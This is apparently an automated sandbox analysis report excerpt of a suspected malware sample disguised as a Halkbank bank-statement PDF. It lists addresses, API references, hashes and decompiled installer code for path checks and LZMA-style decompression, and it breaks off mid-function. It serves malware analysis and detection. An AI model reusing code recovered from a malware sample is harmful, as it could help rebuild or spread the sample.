                                          0x0040162b
                                          0x0040162c
                                          0x004015d7
                                          0x00401634
                                          0x00401663
                                          0x004022f1
                                          0x00401636
                                          0x00401638
                                          0x00401645
                                          0x0040164d
                                          0x00401655
                                          0x0040165b
                                          0x0040165b
                                          0x00401655
                                          0x00402c2d
                                          0x00402c39

                                          APIs
                                            • Part of subcall function 00405FE2: CharNextW.USER32(?,?,00425F50,?,00406056,00425F50,00425F50,74D0FAA0,?,74D0F560,00405D94,?,74D0FAA0,74D0F560,00000000), ref: 00405FF0
                                            • Part of subcall function 00405FE2: CharNextW.USER32(00000000), ref: 00405FF5
                                            • Part of subcall function 00405FE2: CharNextW.USER32(00000000), ref: 0040600D
                                          • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                            • Part of subcall function 00405B99: CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405BDC
                                          • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\Temp,?,00000000,000000F0), ref: 0040164D
                                          Strings
                                          • C:\Users\user\AppData\Local\Temp, xrefs: 00401640
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.259056765.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.259049654.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259066123.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259109034.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_Halkbank_Ekstre_20191102_073809_405251-PDF.jbxd
                                          Similarity
                                          • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                          • String ID: C:\Users\user\AppData\Local\Temp
                                          • API String ID: 1892508949-501415292
                                          • Opcode ID: 5100f8edfc5c73fcce05ecfe13f7e88f84c01c09c33b7a9b27ef58f2b5b0e964
                                          • Instruction ID: a0118e7b9b939ef3ea3e51add98df8039a5aa70d3b8e99a19be4f9c31e9f39fe
                                          • Opcode Fuzzy Hash: 5100f8edfc5c73fcce05ecfe13f7e88f84c01c09c33b7a9b27ef58f2b5b0e964
                                          • Instruction Fuzzy Hash: 04112231508105EBCF30AFA0CD4099E36A0EF15329B28493BF901B22F1DB3E4982DB5E
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040603F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47stringCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 53%
                                          			E0040603F(void* __eflags, intOrPtr _a4) {
				int _t11;
				signed char* _t12;
				long _t16;
				intOrPtr _t18;
				intOrPtr* _t21;
				signed int _t23;

				E00406668(0x425f50, _a4);
				_t21 = E00405FE2(0x425f50);
				if(_t21 != 0) {
					E004068EF(_t21);
					if(( *0x42a278 & 0x00000080) == 0) {
						L5:
						_t23 = _t21 - 0x425f50 >> 1;
						while(1) {
							_t11 = lstrlenW(0x425f50);
							_push(0x425f50);
							if(_t11 <= _t23) {
								break;
							}
							_t12 = E0040699E();
							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
								E00405F83(0x425f50);
								continue;
							} else {
								goto L1;
							}
						}
						E00405F37();
						_t16 = GetFileAttributesW(??); // executed
						return 0 | _t16 != 0xffffffff;
					}
					_t18 =  *_t21;
					if(_t18 == 0 || _t18 == 0x5c) {
						goto L1;
					} else {
						goto L5;
					}
				}
				L1:
				return 0;
			}









                                          0x0040604b
                                          0x00406056
                                          0x0040605a
                                          0x00406061
                                          0x0040606d
                                          0x0040607d
                                          0x0040607f
                                          0x00406097
                                          0x00406098
                                          0x0040609f
                                          0x004060a0
                                          0x00000000
                                          0x00000000
                                          0x00406083
                                          0x0040608a
                                          0x00406092
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0040608a
                                          0x004060a2
                                          0x004060a8
                                          0x00000000
                                          0x004060b6
                                          0x0040606f
                                          0x00406075
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00406075
                                          0x0040605c
                                          0x00000000

                                          APIs
                                            • Part of subcall function 00406668: lstrcpynW.KERNEL32(?,?,00000400,004037B0,00429260,NSIS Error), ref: 00406675
                                            • Part of subcall function 00405FE2: CharNextW.USER32(?,?,00425F50,?,00406056,00425F50,00425F50,74D0FAA0,?,74D0F560,00405D94,?,74D0FAA0,74D0F560,00000000), ref: 00405FF0
                                            • Part of subcall function 00405FE2: CharNextW.USER32(00000000), ref: 00405FF5
                                            • Part of subcall function 00405FE2: CharNextW.USER32(00000000), ref: 0040600D
                                          • lstrlenW.KERNEL32(00425F50,00000000,00425F50,00425F50,74D0FAA0,?,74D0F560,00405D94,?,74D0FAA0,74D0F560,00000000), ref: 00406098
                                          • GetFileAttributesW.KERNELBASE(00425F50,00425F50,00425F50,00425F50,00425F50,00425F50,00000000,00425F50,00425F50,74D0FAA0,?,74D0F560,00405D94,?,74D0FAA0,74D0F560), ref: 004060A8
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.259056765.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.259049654.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259066123.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259109034.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_Halkbank_Ekstre_20191102_073809_405251-PDF.jbxd
                                          Similarity
                                          • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                          • String ID: P_B
                                          • API String ID: 3248276644-906794629
                                          • Opcode ID: 900e3a3aedd828ccf636743a116f58552bc6887dcb5d3e9637a901da882d1290
                                          • Instruction ID: df110f430b83b9381375b5fd3fa67f6c4419d4890c6468873e0fced3c2676832
                                          • Opcode Fuzzy Hash: 900e3a3aedd828ccf636743a116f58552bc6887dcb5d3e9637a901da882d1290
                                          • Instruction Fuzzy Hash: 0DF07826144A1216E622B23A0C05BAF05098F82354B07063FFC93B22E1DF3C8973C43E
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00407194 Relevance: 5.2, APIs: 4, Instructions: 236COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 99%
                                          			E00407194() {
				signed int _t530;
				void _t537;
				signed int _t538;
				signed int _t539;
				unsigned short _t569;
				signed int _t579;
				signed int _t607;
				void* _t627;
				signed int _t628;
				signed int _t635;
				signed int* _t643;
				void* _t644;

				L0:
				while(1) {
					L0:
					_t530 =  *(_t644 - 0x30);
					if(_t530 >= 4) {
					}
					 *(_t644 - 0x40) = 6;
					 *(_t644 - 0x7c) = 0x19;
					 *((intOrPtr*)(_t644 - 0x58)) = (_t530 << 7) +  *(_t644 - 4) + 0x360;
					while(1) {
						L145:
						 *(_t644 - 0x50) = 1;
						 *(_t644 - 0x48) =  *(_t644 - 0x40);
						while(1) {
							L149:
							if( *(_t644 - 0x48) <= 0) {
								goto L155;
							}
							L150:
							_t627 =  *(_t644 - 0x50) +  *(_t644 - 0x50);
							_t643 = _t627 +  *((intOrPtr*)(_t644 - 0x58));
							 *(_t644 - 0x54) = _t643;
							_t569 =  *_t643;
							_t635 = _t569 & 0x0000ffff;
							_t607 = ( *(_t644 - 0x10) >> 0xb) * _t635;
							if( *(_t644 - 0xc) >= _t607) {
								 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t607;
								 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t607;
								_t628 = _t627 + 1;
								 *_t643 = _t569 - (_t569 >> 5);
								 *(_t644 - 0x50) = _t628;
							} else {
								 *(_t644 - 0x10) = _t607;
								 *(_t644 - 0x50) =  *(_t644 - 0x50) << 1;
								 *_t643 = (0x800 - _t635 >> 5) + _t569;
							}
							if( *(_t644 - 0x10) >= 0x1000000) {
								L148:
								_t487 = _t644 - 0x48;
								 *_t487 =  *(_t644 - 0x48) - 1;
								L149:
								if( *(_t644 - 0x48) <= 0) {
									goto L155;
								}
								goto L150;
							} else {
								L154:
								L146:
								if( *(_t644 - 0x6c) == 0) {
									L169:
									 *(_t644 - 0x88) = 0x18;
									L170:
									_t579 = 0x22;
									memcpy( *(_t644 - 0x90), _t644 - 0x88, _t579 << 2);
									_t539 = 0;
									L172:
									return _t539;
								}
								L147:
								 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
								 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
								_t484 = _t644 - 0x70;
								 *_t484 =  &(( *(_t644 - 0x70))[1]);
								 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
								goto L148;
							}
							L155:
							_t537 =  *(_t644 - 0x7c);
							 *((intOrPtr*)(_t644 - 0x44)) =  *(_t644 - 0x50) - (1 <<  *(_t644 - 0x40));
							while(1) {
								L140:
								 *(_t644 - 0x88) = _t537;
								while(1) {
									L1:
									_t538 =  *(_t644 - 0x88);
									if(_t538 > 0x1c) {
										break;
									}
									L2:
									switch( *((intOrPtr*)(_t538 * 4 +  &M00407602))) {
										case 0:
											L3:
											if( *(_t644 - 0x6c) == 0) {
												goto L170;
											}
											L4:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t538 =  *( *(_t644 - 0x70));
											if(_t538 > 0xe1) {
												goto L171;
											}
											L5:
											_t542 = _t538 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t581);
											_push(9);
											_pop(_t582);
											_t638 = _t542 / _t581;
											_t544 = _t542 % _t581 & 0x000000ff;
											asm("cdq");
											_t633 = _t544 % _t582 & 0x000000ff;
											 *(_t644 - 0x3c) = _t633;
											 *(_t644 - 0x1c) = (1 << _t638) - 1;
											 *((intOrPtr*)(_t644 - 0x18)) = (1 << _t544 / _t582) - 1;
											_t641 = (0x300 << _t633 + _t638) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t644 - 0x78))) {
												L10:
												if(_t641 == 0) {
													L12:
													 *(_t644 - 0x48) =  *(_t644 - 0x48) & 0x00000000;
													 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t641 = _t641 - 1;
													 *((short*)( *(_t644 - 4) + _t641 * 2)) = 0x400;
												} while (_t641 != 0);
												goto L12;
											}
											L6:
											if( *(_t644 - 4) != 0) {
												GlobalFree( *(_t644 - 4));
											}
											_t538 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t644 - 4) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t644 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L157:
												 *(_t644 - 0x88) = 1;
												goto L170;
											}
											L14:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x40) =  *(_t644 - 0x40) | ( *( *(_t644 - 0x70)) & 0x000000ff) <<  *(_t644 - 0x48) << 0x00000003;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t45 = _t644 - 0x48;
											 *_t45 =  *(_t644 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t644 - 0x48) < 4) {
												goto L13;
											}
											L16:
											_t550 =  *(_t644 - 0x40);
											if(_t550 ==  *(_t644 - 0x74)) {
												L20:
												 *(_t644 - 0x48) = 5;
												 *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) =  *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											L17:
											 *(_t644 - 0x74) = _t550;
											if( *(_t644 - 8) != 0) {
												GlobalFree( *(_t644 - 8));
											}
											_t538 = GlobalAlloc(0x40,  *(_t644 - 0x40)); // executed
											 *(_t644 - 8) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t557 =  *(_t644 - 0x60) &  *(_t644 - 0x1c);
											 *(_t644 - 0x84) = 6;
											 *(_t644 - 0x4c) = _t557;
											_t642 =  *(_t644 - 4) + (( *(_t644 - 0x38) << 4) + _t557) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L158:
												 *(_t644 - 0x88) = 3;
												goto L170;
											}
											L22:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											_t67 = _t644 - 0x70;
											 *_t67 =  &(( *(_t644 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L23:
											 *(_t644 - 0x48) =  *(_t644 - 0x48) - 1;
											if( *(_t644 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t559 =  *_t642;
											_t626 = _t559 & 0x0000ffff;
											_t596 = ( *(_t644 - 0x10) >> 0xb) * _t626;
											if( *(_t644 - 0xc) >= _t596) {
												 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t596;
												 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t596;
												 *(_t644 - 0x40) = 1;
												_t560 = _t559 - (_t559 >> 5);
												__eflags = _t560;
												 *_t642 = _t560;
											} else {
												 *(_t644 - 0x10) = _t596;
												 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
												 *_t642 = (0x800 - _t626 >> 5) + _t559;
											}
											if( *(_t644 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t644 - 0x6c) == 0) {
												L168:
												 *(_t644 - 0x88) = 5;
												goto L170;
											}
											L138:
											 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L139:
											_t537 =  *(_t644 - 0x84);
											L140:
											 *(_t644 - 0x88) = _t537;
											goto L1;
										case 6:
											L25:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L36:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L26:
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												L35:
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												L32:
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											L66:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												L68:
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											L67:
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											L70:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											L73:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											L74:
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											L75:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											L82:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L84:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L83:
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											L85:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L164:
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											L100:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L159:
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											L38:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											L40:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												L45:
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L160:
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											L47:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												L49:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													L53:
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L161:
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											L59:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
